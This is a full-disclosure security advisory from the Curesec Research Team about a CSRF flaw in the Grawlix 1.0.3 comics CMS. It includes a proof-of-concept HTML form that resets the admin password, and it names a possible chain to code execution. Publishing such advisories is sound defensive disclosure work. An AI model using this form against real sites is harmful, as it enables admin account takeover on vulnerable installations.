Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Grawlix 1.0.3
Fixed in:not fixed
Fixed Version Link:n/a
Vendor Website:
Vulnerability Type:CSRF
Remote Exploitable:Yes
Reported to vendor:11/17/2015
Disclosed to public:12/21/2015
Release mode:Full Disclosure
CVE: n/a
CreditsTim Coen of Curesec GmbH
2. Overview
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
Grawlix is a CMS for publishing comics, which is written in PHP. In version
1.0.3, it does not have CSRF protection, which means that an attacker can
perform actions for a victim,if the victim visits an attacker controlled site
while logged in.
An attacker can for example change the password of an existing admin account,
which may in turn lead to code execution via a different vulnerability in the
admin area.3. Proof of Concept
Change admin password:<html><body><form action="http://localhost/grawlix-1.0.3/grawlix-1.0.3/_admin/user.config.php" method="POST"><inputtype="hidden" name="username[1]" value="admin"/><inputtype="hidden" name="email[1]" value=""/><inputtype="hidden" name="password[1]" value="admin"/><inputtype="hidden" name="confirm_password[1]" value="admin"/><inputtype="hidden" name="submit" value="save"/><inputtype="submit" value="Submit request"/></form></body></html>4. Solution
This issue was not fixed by the vendor.5. Report Timeline
11/17/2015 Informed Vendor about Issue (no reply)12/10/2015 Reminded Vendor of Disclosure Date (no reply)12/21/2015 Disclosed to public
Blog Reference:
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-2413089 Berlin, Germany